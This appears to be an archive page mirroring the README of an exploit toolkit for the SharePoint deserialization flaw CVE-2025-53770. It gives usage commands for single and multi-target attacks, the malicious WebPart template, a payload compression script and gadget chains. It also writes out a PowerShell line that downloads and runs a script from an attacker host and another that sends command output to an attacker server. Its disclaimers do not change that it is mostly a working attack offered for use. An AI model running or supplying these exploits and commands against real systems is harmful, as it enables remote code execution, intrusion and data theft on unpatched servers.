Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
SharePoint WebPart Injection Exploit Tool
Readme
## 📌 SharePoint WebPart Injection Exploit Toolkit
🍕 Exploit tool for SharePoint WebPart Injection via ToolPane.aspx, leading to .NET deserialization and potential remote code execution (RCE).
**Developed by:** [@GOTOCVE](https://t.me/GOTOCVE)
---
## 🌍 Overview
This tool exploits a vulnerability in Microsoft SharePoint (on-premises) that allows authenticated users to abuse the ToolPane.aspx endpoint and inject malicious WebParts containing GZIP-compressed serialized .NET objects.
The injected object is placed inside the `MSOTlPn_SelectedWpId` parameter and embedded in a fake WebPart (such as `<Scorecard:ExcelDataSet>`) that gets parsed and deserialized by the SharePoint backend.
---
## ⚙️ Features
- ✅ Automatic endpoint validation (ToolPane.aspx)
- ✅ Injection of user-supplied payloads (GZIP+Base64-encoded .NET LosFormatter objects)
- ✅ Proxy support for Burp/ZAP
- ✅ Support for file-based or direct payload input
## 🧪 Supported Versions
| Product | Affected Versions |
|-----------------------------|-----------------------------|
| SharePoint Server 2016 | 16.0.4351.1000 - 16.0.5508.1000 |
| SharePoint Server 2019 | 16.0.10337.12109 - 16.0.10417.20027 |
### ⚡ Vulnerability Summary
| Field | Value |
| --------- | ---------------------------------------------- |
| Component | Microsoft SharePoint (On-Premises) |
| Endpoint | `/layouts/15/ToolPane.aspx` |
| Parameter | `MSOTlPn_DWP` |
| WebPart | `<Scorecard:ExcelDataSet CompressedDataTable>` |
| Issue | Insecure .NET deserialization |
| CVE | **CVE-2025-53770** |
---
### 🧰 Toolkit Components
#### ✅ 1. `exploit.py`
Multi-threaded SharePoint exploit tool for CVE-2025-53770.
* Detects SharePoint + version
* Checks access to `/ToolPane.aspx`
* Sends malicious WebPart payload
#### ✅ 2. `YSLosf.exe`
LosFormatter Payload Generator & Deserializer.
<img width="1918" height="827" alt="image" src="https://github.com/user-attachments/assets/dbdcfa1a-1601-4a21-a871-b359407be66a" />
## 🚀 Usage
### 🔸 Basic Usage
```bash
python3 exploit.py -u https://target -p payload.txt
```
### 🔸 Multiple Targets
```bash
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080
```
### 🔸 All Arguments
| Argument | Description |
|---------------|----------------------------------------------------|
| `-u` | Target URL (e.g., `https://sp.company.local`) |
| `-f` | File containing target URLs (one per line) |
| `-p` | Payload file or direct Base64 GZIP string |
| `--proxy` | Optional proxy (e.g., `http://127.0.0.1:8080`) |
| `-t` | Timeout in seconds (default: 15) |
---
### 🔧 Requirements
* Python 3.10
* Install dependencies:
```bash
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
* .NET 4.8 Runtime (to run `YSLosf.exe`)
---
### 💥 Payload Structure
Your payload must be:
1. A .NET object (e.g. `DataSet`, `ObjectDataProvider`)
2. Serialized using `LosFormatter` or `BinaryFormatter`
3. Base64-encoded
4. GZIP-compressed
Embedded in a WebPart like:
```aspx
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
</div>
</ProgressTemplate>
</asp:UpdateProgress>
```
---
### 🛠 Generating Payloads with `YSLosf`
#### Step 1: Create Payload File
Put your command (e.g., reverse shell) into `payload.txt`:
```powershell
powershell -nop -c iwr http://attacker/shell.ps1 | iex
```
#### Step 2: Generate Base64 Payload
```bash
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j
Base64 encoded:
L3dFRkJXWnNkRzFq
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc
```
#### Step 3: Compress & Finalize
```python
# compress.py
import gzip, base64
with open("base64.txt", "rb") as f:
b64 = base64.b64decode(f.read())
gz = gzip.compress(b64)
# print(base64.b64encode(gz).decode())
encoded = base64.b64encode(gz).decode()
with open("payload-final.txt", "w") as out_file:
out_file.write(encoded)
```
Save the output into `payload-final.txt` and pass it to the exploit tool.
---
### 🧵 Supported Gadget Chains
* `System.Data.DataSet`
* `System.Data.Services.Internal.ExpandedWrapper`
* `System.Windows.Data.ObjectDataProvider`
* `System.Web.UI.LosFormatter`
---
### 📡 Notes on Command Output
This vulnerability does **not return output** (e.g. `ipconfig`) in the response. You must:
* Use reverse shell payloads
* Or exfil output:
```powershell
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"
```
---
### ⚠️ Legal Disclaimer
> This tool is provided for **educational and authorized security testing** only.
>
> Do **not** use against systems without explicit permission.
> Misuse may be illegal and unethical.
---
## 🔍 Detection
If a vulnerable server accepts the payload and reflects `MSOTlPn_SelectedWpId` or renders the page with the injected WebPart, it's likely exploitable. No output means the deserialization failed or the server patched it.
---
## 🛑 Legal Clarification & Scope of this Tool
This tool **does not deliver or execute any shellcode, web shell.**
It only demonstrates exploitation of the **.NET deserialization vulnerability (CVE-2025-53770)** through the vulnerable `ToolPane.aspx` endpoint using a malicious WebPart structure containing a GZIP-compressed `.NET` object.
🔹 **Purpose**: To help researchers, red teamers, and defenders detect vulnerable SharePoint servers and test the injection vector safely with **custom payloads**.
🔹 **Payloads**: The tool requires users to **generate their own payloads** (e.g., using `YSLosf.exe`) which are embedded in the WebPart as Base64-encoded GZIP strings.
It is the user’s responsibility to **choose appropriate and ethical payloads** (such as harmless `calc.exe` execution, beacon markers, etc.).
🔹 **NO Reverse Shells/Web Shells included**:
While attackers in the wild may drop web shells like `spinstall0.aspx`, **this project does not include any such logic**.
If you're planning on delivering a reverse shell, you **must generate your own payload manually** and **take full responsibility** for its use.
### 📢 More Exploits & CVEs?
Join **[@GOTOCVE](https://t.me/GOTOCVE)** on Telegram:
* 🔍 Weekly CVE breakdowns
* 🧠 Deep exploit writeups
* 🛡 Red & Blue Team content
* 💣 Real PoCs & detection tips
## 📬 Contact
Created by [Ali Soltani](https://github.com/soltanali0)
For research inquiries or bug reports, message via [Telegram](https://t.me/soltanali0)
File Snapshot
[4.0K] /data/pocs/f0dd6f076ace6efc48a428c18c07e086fc3206b3
├── [ 300] compress.py
├── [5.8K] exploit.py
├── [7.0K] README.md
├── [ 120] requirements.txt
└── [4.0K] YSLosf
├── [2.2K] Program.cs
└── [ 368] YSLosf.csproj
1 directory, 6 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →